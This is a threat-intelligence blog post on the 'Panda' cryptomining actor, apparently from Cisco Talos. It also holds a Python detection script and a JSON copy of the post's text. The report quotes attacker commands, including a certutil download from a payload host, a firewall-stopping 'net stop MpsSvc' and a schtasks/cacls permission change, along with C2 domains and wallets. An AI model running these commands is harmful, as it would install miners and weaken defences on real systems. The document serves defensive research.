_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._
## Executive summary
A new threat actor named "Panda" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools for traversing networks, and their use of RATs mean that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information.
Panda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromise and proofs of concept. Our threat traps show that Panda uses exploits previously used by Shadow Brokers — a group infamous for publishing information from the National Security Agency — and Mimikatz, an open-source credential-dumping program.
Talos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread "MassMiner" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, and IT services industries were affected in these campaigns.
## First sightings of the not-so-elusive Panda
We first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called "[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)" through the wallet, infrastructure, and post-exploit PowerShell commands used.
Panda used Masscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called "downloader.exe," saving it in the TEMP folder under a simple number filename such as "13.exe" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as from kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000.
By October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times.
The sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block.
One of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name "Panda."
## Bulehero connection
Around the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called "download.exe" from b[.]bulehero[.]in and, similarly, saved it under another simple number filename such as "13.exe" and executed it. The file server turned out to be an instance of HFS hosting four malicious files.
Running the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining.
Additionally, the sample attempts to shut down the victim's firewall with commands such as "cmd /c net stop MpsSvc". The malware also modifies the access control list to grant full access to certain files by running cacls.exe.
For example:
> cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F"
Both of these behaviors have also been observed in previous MassMiner infections.
The malware also issues a GET request to the Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp, which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign.
Additionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the "Shadow Brokers" exploits and were installed in a suspiciously named directory: "\Windows\InfusedAppe\Eternalblue139\specials\".
## Evolution of Panda
In January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China.
Panda used this vulnerability both to directly download a file called "download.exe" from a46[.]bulehero[.]in and to upload a simple PHP web shell to the path "/public/hydra.php", which is subsequently used to invoke PowerShell to download the same executable file. The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to "/public/hydra.php". Download.exe downloads the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempts to move laterally within compromised organizations.
In March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in.
At the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called "download.exe" from the URL hxxp://fid[.]hognoob[.]se/download.exe and saves it in the Temp folder, although Panda now saves it under a high-entropy filename such as 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named "wercplshost.exe" from fid[.]hognoob[.]se as well as a configuration file called "cfg.ini" from uio[.]hognoob[.]se, which provides configuration details for the miner.
"Wercplshost.exe" contains exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords.
Soon thereafter, Panda began leveraging an updated payload. Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: "certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe". The coinminer is also run using the command "cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\\[filename].exe".
The updated payload still includes exploit modules designed for lateral movement, many of which are related to the "Shadow Brokers" exploits. One departure, however, is in how it finds targets: previously observed samples acquired the victim's internal IP and reached out to the Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample instead installs WinPcap and the open-source tool Masscan and scans for open ports on public IP addresses, saving the results to "Scant.txt" (note the typo). The sample also writes a list of hardcoded IP ranges to "ip.txt" and passes it to Masscan to scan for port 445, saving the results to "results.txt." This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously used tools, launching Mimikatz to collect victim passwords.
In June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same.
## Recent activity
Panda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of "a" - "z" characters and the last five consisting of digits (e.g., "xblzcdsafdmqslz19595.exe"). Panda then executes the file via PowerShell. Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se.
Besides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz.
One difference is that several samples contained a Gh0st RAT default mutex "DOWNLOAD_SHELL_MUTEX_NAME" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior.
On August 19, 2019, we observed that Panda had added another set of domains to their inventory of C2 and payload-hosting infrastructure. In line with their previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as "BBBBB" instead of under a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18.
In line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to "oo[.]mygoodluck[.]best:51888:WervPoxySvc", and made a DNS request for this domain. The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club.
Cisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best.
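The behaviors described in the Bulehero, Evolution and Recent activity sections (the `net stop MpsSvc` firewall shutdown, the schtasks/cacls ACL change, Certutil used as a downloader, the `ping 127.0.0.1 -n 5 & Start` delay, and the Temp-folder drop names "13.exe", 15 letters plus digits, and "BBBBB") can be turned into host-based detection logic. The following is an added example, not code from the original report or from Talos: it assumes process-creation events (image path plus command line, as Sysmon event ID 1 would provide) and runs them through one rule per behavior. The sample events are constructed for this example; the digit count in the random-name rule is generalised to four or five to cover both observed forms.

```python
"""Flag process-creation events that match the Panda TTPs described above.

Assumed input: one dict per event with "image" (full path of the started
executable) and "cmdline" (its command line). The sample events below are
constructed for this example and are not taken from the original report.
"""
import re
from typing import Dict, List

# Temp-folder drop names seen across the campaigns: a bare number ("13.exe"),
# 15 lowercase letters followed by digits ("autzipmfvidixxr7407.exe",
# "xblzcdsafdmqslz19595.exe"; 4-5 digits covers both observed forms), and the
# literal "BBBBB" (assumed here to appear with or without an .exe extension).
DROP_NAME_PATTERNS = [
    re.compile(r"^\d{1,3}\.exe$", re.IGNORECASE),
    re.compile(r"^[a-z]{15}\d{4,5}\.exe$"),
    re.compile(r"^BBBBB(\.exe)?$"),
]
TEMP_DIR = re.compile(r"[\\/]windows[\\/]temp[\\/]", re.IGNORECASE)

# Command-line rules, each tied to one behaviour in the write-up.
CMDLINE_RULES = {
    # certutil used as a downloader: "-urlcache -split -f <url> <dest>"
    "certutil_download": re.compile(
        r"\bcertutil(\.exe)?\b.*-urlcache\b.*-f\s+https?://", re.IGNORECASE),
    # "ping 127.0.0.1 -n 5 & Start <payload>" used as a sleep before launch
    "ping_delay_then_start": re.compile(
        r"\bping\s+127\.0\.0\.1\s+-n\s+\d+\s*&\s*start\b", re.IGNORECASE),
    # Windows Firewall service stopped
    "firewall_service_stop": re.compile(r"\bnet\s+stop\s+MpsSvc\b", re.IGNORECASE),
    # scheduled task that grants Everyone full control via cacls
    "schtasks_cacls_everyone": re.compile(
        r"\bschtasks\b.*\bcacls\b.*everyone:F\b", re.IGNORECASE),
}


def _basename(path: str) -> str:
    """Last path component, accepting either Windows or POSIX separators."""
    return re.split(r"[\\/]", path)[-1]


def scan_event(event: Dict[str, str]) -> List[str]:
    """Return the names of all rules the event matches (empty list if none)."""
    hits: List[str] = []
    image = event.get("image", "")
    if TEMP_DIR.search(image) and any(p.match(_basename(image)) for p in DROP_NAME_PATTERNS):
        hits.append("temp_drop_name")
    cmdline = event.get("cmdline", "")
    for name, pattern in CMDLINE_RULES.items():
        if pattern.search(cmdline):
            hits.append(name)
    return hits


def scan_events(events: List[Dict[str, str]]):
    """Return (index, hits) for every event that triggered at least one rule."""
    results = [(i, scan_event(e)) for i, e in enumerate(events)]
    return [(i, hits) for i, hits in results if hits]


# Constructed sample events mirroring the TTPs in the report (paths illustrative).
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\Temp\13.exe", "cmdline": r"C:\Windows\Temp\13.exe"},
    {"image": r"C:\Windows\temp\autzipmfvidixxr7407.exe",
     "cmdline": r"C:\Windows\temp\autzipmfvidixxr7407.exe"},
    {"image": r"C:\Windows\Temp\xblzcdsafdmqslz19595.exe",
     "cmdline": r"C:\Windows\Temp\xblzcdsafdmqslz19595.exe"},
    {"image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\Windows\Temp\upnpprhost.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\ugrpkute\abc.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "cmdline": r"cmd /c net stop MpsSvc"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd /c schtasks /create /sc minute /mo 1 /tn "Netframework" /ru system /tr "cmd /c echo Y|cacls C:\Windows\appveif.exe /p everyone:F"'},
    # benign controls: ordinary tool use and a legitimate certutil invocation
    {"image": r"C:\Program Files\Git\bin\git.exe", "cmdline": "git status"},
    {"image": r"C:\Windows\System32\certutil.exe", "cmdline": "certutil -hashfile setup.msi SHA256"},
]

if __name__ == "__main__":
    for index, hits in scan_events(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Command-line rules alone will not catch a renamed certutil binary; pairing them with the Temp-folder name check and with network blocks on the listed domains gives more than one chance to see the chain.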
## Conclusion
Panda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated.
However, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold.
Panda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and are quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. And, if a cryptocurrency miner is able to infect your system, that means another actor could use the same infection vector to deliver other malware. Panda remains an active threat and Talos will continue to monitor their activity in order to thwart their operations.
## COVERAGE
For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>)
Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.
Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.
Network Security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.
[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.
[Umbrella](<https://umbrella.cisco.com/>), our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.
Open Source SNORT® Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on [Snort.org](<https://www.snort.org/products>).
## IOCs
### Domains
### IPs
### SHA-256
### Monero Wallets
49Rocc2niuCTyVMakjq7zU7njgZq3deBwba3pTcGFjLnB2Gvxt8z6PsfEn4sc8WPPedTkGjQVHk2RLk7btk6Js8gKv9iLCi 1198.851653275126
4AN9zC5PGgQWtg1mTNZDySHSS79nG1qd4FWA1rVjEGZV84R8BqoLN9wU1UCnmvu1rj89bjY4Fat1XgEiKks6FoeiRi1EHhh
44qLwCLcifP4KZfkqwNJj4fTbQ8rkLCxJc3TW4UBwciZ95yWFuQD6mD4QeDusREBXMhHX9DzT5LBaWdVbsjStfjR9PXaV9L

{"id": "TALOSBLOG:E8F926D413AF8A060A5CA7289C0EAD20", "type": "talosblog", "bulletinFamily": "blog", "title": "Cryptocurrency miners aren\u2019t dead yet: Documenting the voracious but simple \u201cPanda\u201d", "description": "_By [Christopher Evans](<https://twitter.com/ccevans002>) and [David Liebenberg](<https://twitter.com/ChinaHandDave>)._ \n\n\n## \n\n\n## Executive summary\n\nA new threat actor named \"Panda\" has generated thousands of dollars worth of the Monero cryptocurrency through the use of remote access tools (RATs) and illicit cryptocurrency-mining malware. This is far from the most sophisticated actor we've ever seen, but it still has been one of the most active attackers we've seen in Cisco Talos threat trap data. Panda's willingness to persistently exploit vulnerable web applications worldwide, their tools allowing them to traverse throughout networks, and their use of RATs, means that organizations worldwide are at risk of having their system resources misused for mining purposes or worse, such as exfiltration of valuable information. \n \nPanda has shown time and again they will update their infrastructure and exploits on the fly as security researchers publicize indicators of compromises and proof of concepts. Our threat traps show that Panda uses exploits previously used by Shadow Brokers \u2014 a group infamous for publishing information from the National Security Agency \u2014 and Mimikatz, an open-source credential-dumping program. \n \nTalos first became aware of Panda in the summer of 2018, when they were engaging in the successful and widespread \"MassMiner\" campaign. Shortly thereafter, we linked Panda to another widespread illicit mining campaign with a different set of command and control (C2) servers. Since then, this actor has updated its infrastructure, exploits and payloads. 
We believe Panda is a legitimate threat capable of spreading cryptocurrency miners that can use up valuable computing resources and slow down networks and systems. Talos confirmed that organizations in the banking, healthcare, transportation, telecommunications, IT services industries were affected in these campaigns. \n \n\n\n[](<https://1.bp.blogspot.com/-lf0T3p1bzKg/XYDfgN1h6mI/AAAAAAAAB7o/HvFMxzb8QhQbUO85JND7yrZfjwu7xAfTACLcBGAsYHQ/s1600/image4.png>)\n\n## \n\n\n## First sightings of the not-so-elusive Panda\n\nWe first observed this actor in July of 2018 exploiting a WebLogic vulnerability ([CVE-2017-10271](<https://nvd.nist.gov/vuln/detail/CVE-2017-10271>)) to drop a miner that was associated with a campaign called \"[MassMiner](<https://www.alienvault.com/blogs/labs-research/massminer-malware-targeting-web-servers>)\" through the wallet, infrastructure, and post-exploit PowerShell commands used. \n \nPanda used massscan to look for a variety of different vulnerable servers and then exploited several different vulnerabilities, including the aforementioned Oracle bug and a remote code execution vulnerability in Apache Struts 2 ([CVE-2017-5638](<https://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>)). They used PowerShell post-exploit to download a miner payload called \"downloader.exe,\" saving it in the TEMP folder under a simple number filename such as \"13.exe\" and executing it. The sample attempts to download a config file from list[.]idc3389[.]top over port 57890, as well as kingminer[.]club. The config file specifies the Monero wallet to be used as well as the mining pool. In all, we estimate that Panda has amassed an amount of Monero that is currently valued at roughly $100,000. 
\n\n\n[](<https://1.bp.blogspot.com/-7Ed1781BBr4/XYDfrwNRtKI/AAAAAAAAB7s/nxr6w2FndDcpsmMKiH8a45uPRZmxCy3FgCLcBGAsYHQ/s1600/image6.png>)\n\n \nBy October 2018, the config file on list[.]idc3389[.]top, which was then an instance of an HttpFileServer (HFS), had been downloaded more than 300,000 times. \n\n\n[](<https://1.bp.blogspot.com/-fpXoN_jw0UU/XYDfx_msBlI/AAAAAAAAB70/SEJLWIIEjUI0rt_HBXROjCsy3KH2RXUrACLcBGAsYHQ/s1600/image5.png>)\n\nThe sample also installs Gh0st RAT, which communicates with the domain rat[.]kingminer[.]club. In several samples, we also observed Panda dropping other hacking tools and exploits. This includes the credential-theft tool Mimikatz and UPX-packed artifacts related to the Equation Group set of exploits. The samples also appear to scan for open SMB ports by reaching out over port 445 to IP addresses in the 172.105.X.X block. \n \nOne of Panda's C2 domains, idc3389[.]top, was registered to a Chinese-speaking actor, who went by the name \"Panda.\" \n \n\n\n## Bulehero connection\n\nAround the same time that we first observed these initial Panda attacks, we observed very similar TTPs in an attack using another C2 domain: bulehero[.]in. The actors used PowerShell to download a file called \"download.exe\" from b[.]bulehero[.]in, and similarly, save it as another simple number filename such as \"13.exe\" and execute it. The file server turned out to be an instance of HFS hosting four malicious files. \n\n\n[](<https://1.bp.blogspot.com/-GbyctYMnyRo/XYDgCR5tbSI/AAAAAAAAB78/3xs1gHqsMD8svymJLjA81TtAbCC4XsTZwCLcBGAsYHQ/s1600/image8.png>)\n\n \nRunning the sample in our sandboxes, we observed several elements that connect it to the earlier MassMiner campaign. First, it issues a GET request for a file called cfg.ini hosted on a different subdomain of bulehero[.]in, c[.]bulehero[.]in, over the previously observed port 57890. 
Consistent with MassMiner, the config file specifies the site from which the original sample came, as well as the wallet and mining pool to be used for mining. \n \nAdditionally, the sample attempts to shut down the victim's firewall with commands such as \"cmd /c net stop MpsSvc\". The malware also modifies the access control list to grant full access to certain files through running cacsl.exe. \n \nFor example: \n\n\n> cmd /c schtasks /create /sc minute /mo 1 /tn \"Netframework\" /ru system /tr \"cmd /c echo Y|cacls C:\\Windows\\appveif.exe /p everyone:F\n\nBoth of these behaviors have also been observed in previous MassMiner infections. \n \nThe malware also issues a GET request to Chinese-language IP geolocation service ip138[.]com for a resource named ic.asp which provides the machine's IP address and location in Chinese. This behavior was also observed in the MassMiner campaign. \n \nAdditionally, appveif.exe creates a number of files in the system directory. Many of these files were determined to be malicious by multiple AV engines and appear to match the exploits of vulnerabilities targeted in the MassMiner campaign. For instance, several artifacts were detected as being related to the \"Shadow Brokers\" exploits and were installed in a suspiciously named directory: \"\\Windows\\InfusedAppe\\Eternalblue139\\specials\\\". \n \n\n\n## Evolution of Panda\n\nIn January of 2019, Talos analysts observed Panda exploiting a recently disclosed vulnerability in the ThinkPHP web framework (CNVD-2018-24942) in order to spread similar malware. ThinkPHP is an open-source web framework popular in China. \n \nPanda used this vulnerability to both directly download a file called \"download.exe\" from a46[.]bulehero[.]in and upload a simple PHP web shell to the path \"/public/hydra.php\", which is subsequently used to invoke PowerShell to download the same executable file. 
The web shell provides only the ability to invoke arbitrary system commands through URL parameters in an HTTP request to \"/public/hydra.php\". Download.exe would download the illicit miner payload and also engages in SMB scanning, evidence of Panda's attempt to move laterally within compromised organizations. \n \nIn March 2019, we observed the actor leveraging new infrastructure, including various subdomains of the domain hognoob[.]se. At the time, the domain hosting the initial payload, fid[.]hognoob[.]se, resolved to the IP address 195[.]128[.]126[.]241, which was also associated with several subdomains of bulehero[.]in. \n \nAt the time, the actor's tactics, techniques, and procedures (TTPs) remained similar to those used before. Post-exploit, Panda invokes PowerShell to download an executable called \"download.exe\" from the URL hxxp://fid[.]hognoob[.]se/download.exe and save it in the Temp folder, although Panda now saved it under a high-entropy filename i.e. 'C:/Windows/temp/autzipmfvidixxr7407.exe'. This file then downloads a Monero mining trojan named \"wercplshost.exe\" from fid[.]hognoob[.]se as well as a configuration file called \"cfg.ini\" from uio[.]hognoob[.]se, which provides configuration details for the miner. \n\n\n[](<https://1.bp.blogspot.com/-6B6MTCm_3U8/XYDgMB6l-xI/AAAAAAAAB8A/g3ux2o0d2KgGC-H6Sy9BiLx4KUTSo8LwQCLcBGAsYHQ/s1600/image7.png>)\n\n \n\"Wercplshost.exe\" contains exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits, and engages in SMB brute-forcing. The sample acquires the victim's internal IP and reaches out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. It also uses the open-source tool Mimikatz to collect victim passwords. \n \nSoon thereafter, Panda began leveraging an updated payload. 
Some of the new features of the payload include using Certutil to download the secondary miner payload through the command: \"certutil.exe -urlcache -split -f http://fid[.]hognoob[.]se/upnpprhost.exe C:\\Windows\\Temp\\upnpprhost.exe\". The coinminer is also run using the command \"cmd /c ping 127.0.0.1 -n 5 & Start C:\\Windows\\ugrpkute\\\\[filename].exe\". \n \nThe updated payload still includes exploit modules designed for lateral movement, many of which are related to the \"Shadow Brokers\" exploits. One departure, however, is previously observed samples acquire the victim's internal IP and reach out to Chinese-language IP geolocation site 2019[.]ip138[.]com to get the external IP, using the victim's Class B address as a basis for port scanning. This sample installs WinPcap and open-source tool Masscan and scans for open ports on public IP addresses saving the results to \"Scant.txt\" (note the typo). The sample also writes a list of hardcoded IP ranges to \"ip.txt\" and passes it to Masscan to scan for port 445 and saves the results to \"results.txt.\" This is potentially intended to find machines vulnerable to MS17-010, given the actor's history of using EternalBlue. The payload also leverages previously-used tools, launching Mimikatz to collect victim passwords \n \nIn June, Panda began targeting a newer WebLogic vulnerability, [CVE-2019-2725](<https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html>), but their TTPs remained the same. \n \n\n\n## Recent activity\n\nPanda began employing new C2 and payload-hosting infrastructure over the past month. We observed several attacker IPs post-exploit pulling down payloads from the URL hxxp[:]//wiu[.]fxxxxxxk[.]me/download.exe and saving it under a random 20-character name, with the first 15 characters consisting of \"a\" - \"z\" characters and the last five consisting of digits (e.g., \"xblzcdsafdmqslz19595.exe\"). Panda then executes the file via PowerShell. 
Wiu[.]fxxxxxxk[.]me resolves to the IP 3[.]123[.]17[.]223, which is associated with older Panda C2s including a46[.]bulehero[.]in and fid[.]hognoob[.]se. \n \nBesides the new infrastructure, the payload is relatively similar to the one they began using in May 2019, including using Certutil to download the secondary miner payload located at hxxp[:]//wiu[.]fxxxxxxk[.]me/sppuihost.exe and using ping to delay execution of this payload. The sample also includes Panda's usual lateral movement modules that include Shadow Brokers' exploits and Mimikatz. \n \nOne difference is that several samples contained a Gh0st RAT default mutex \"DOWNLOAD_SHELL_MUTEX_NAME\" with the mutex name listed as fxxk[.]noilwut0vv[.]club:9898. The sample also made a DNS request for this domain. The domain resolved to the IP 46[.]173[.]217[.]80, which is also associated with several subdomains of fxxxxxxk[.]me and older Panda C2 hognoob[.]se. Combining mining capabilities and Gh0st RAT represents a return to Panda's earlier behavior. \n \nOn August 19, 2019, we observed that Panda has added another set of domains to his inventory of C2 and payload-hosting infrastructure. In line with his previous campaigns, we observed multiple attacker IPs pulling down payloads from the URL hxxp[:]//cb[.]f*ckingmy[.]life/download.exe. In a slight departure from previous behavior, the file was saved as \"BBBBB,\", instead of as a random 20-character name. cb[.]f*ckingmy[.]life (URL censored due to inappropriate language) currently resolves to the IP 217[.]69[.]6[.]42, and was first observed by Cisco Umbrella on August 18. \n \nIn line with previous samples Talos has analyzed over the summer, the initial payload uses Certutil to download the secondary miner payload located at http[:]//cb[.]fuckingmy[.]life:80/trapceapet.exe. This sample also includes a Gh0st RAT mutex, set to \"oo[.]mygoodluck[.]best:51888:WervPoxySvc\", and made a DNS request for this domain. 
The domain resolved to 46[.]173[.]217[.]80, which hosts a number of subdomains of fxxxxxxk[.]me and hognoob[.]se, both of which are known domains used by Panda. The sample also contacted li[.]bulehero2019[.]club. \n \nCisco Threat Grid's analysis also showed artifacts associated with Panda's typical lateral movement tools that include Shadow Brokers exploits and Mimikatz. The INI file used for miner configuration lists the mining pool as mi[.]oops[.]best, with a backup pool at mx[.]oops[.]best. \n\n\n[](<https://1.bp.blogspot.com/-2-PgtrQPKAE/XYDgeQ-XHeI/AAAAAAAAB8Q/2AJE3Rk0IHURq9oeqIjqMw-Ft37AHxp_ACLcBGAsYHQ/s1600/image1.png>)\n\n[](<https://1.bp.blogspot.com/-uPJKV52J9K0/XYDgjBhDZaI/AAAAAAAAB8U/sfPHOODu5c8pmRVRrcPdlaQ6G-VnpW9VQCLcBGAsYHQ/s1600/image3.png>)\n\n## \n\n\n## Conclusion\n\nPanda's operational security remains poor, with many of their old and current domains all hosted on the same IP and their TTPs remaining relatively similar throughout campaigns. The payloads themselves are also not very sophisticated. \n \nHowever, system administrators and researchers should never underestimate the damage an actor can do with widely available tools such as Mimikatz. Some information from HFS used by Panda shows that this malware had a wide reach and rough calculations on the amount of Monero generated show they made around 1,215 XMR in profits through their malicious activities, which today equals around $100,000, though the amount of realized profits is dependent on the time they sold. \n \nPanda remains one of the most consistent actors engaging in illicit mining attacks and frequently shifts the infrastructure used in their attacks. They also frequently update their targeting, using a variety of exploits to target multiple vulnerabilities, and is quick to start exploiting known vulnerabilities shortly after public POCs become available, becoming a menace to anyone slow to patch. 
And if a cryptocurrency miner is able to infect your system, another actor could use the same infection vector to deliver other malware. Panda remains an active threat, and Talos will continue to monitor their activity in order to thwart their operations.

## Coverage

For coverage related to blocking illicit cryptocurrency mining, please see the Cisco Talos white paper: [Blocking Cryptocurrency Mining Using Cisco Security Products](<https://talosintelligence.com/resources/65>)

[](<https://1.bp.blogspot.com/-VoLoSQumND8/XYDgUqa4CvI/AAAAAAAAB8I/dQAoulvM4nofqrokMtgPSQZJYLLOLLmZwCLcBGAsYHQ/s1600/image2.png>)

Advanced Malware Protection ([AMP](<https://www.cisco.com/c/en/us/products/security/advanced-malware-protection>)) is ideally suited to prevent the execution of the malware used by these threat actors.

Cisco Cloud Web Security ([CWS](<https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html>)) or [Web Security Appliance (WSA)](<https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html>) web scanning prevents access to malicious websites and detects malware used in these attacks.

Network security appliances such as [Next-Generation Firewall (NGFW)](<https://www.cisco.com/c/en/us/products/security/firewalls/index.html>), [Next-Generation Intrusion Prevention System (NGIPS)](<https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html>), and [Meraki MX](<https://meraki.cisco.com/products/appliances>) can detect malicious activity associated with this threat.

[AMP Threat Grid](<https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html>) helps identify malicious binaries and build protection into all Cisco Security products.
